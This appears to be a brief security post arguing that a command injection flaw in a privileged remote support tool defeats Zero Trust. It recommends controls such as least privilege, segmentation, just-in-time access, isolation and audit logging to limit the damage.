Zero Trust won’t save you from a vulnerable admin tool by itself.

Ask one question:
If this box is compromised, what’s the maximum damage it can do in 10 minutes?

A command injection in a privileged remote support platform collapses the trust boundary. The “helpdesk tool” becomes:
– Immediate privileged code execution
– Credential access and session hijack potential
– Fast lateral movement across managed endpoints

Zero Trust helps only if it is translated into hard controls that shrink blast radius:
– Least privilege for the platform service accounts and integrations
– Network segmentation so the tool cannot reach everything by default
– Just-in-time access for technicians and elevated actions
– Isolation: dedicated jump hosts, separate admin planes, restricted egress
– Application allowlisting and controlled script execution
– Session recording and strong audit logs that cannot be tampered with
– Compensating monitoring: alert on unusual commands, new tool binaries, and rapid host-to-host pivots

Remote support is operationally critical. Treat it like a Tier 0 asset.
Design it so compromise is survivable, not catastrophic.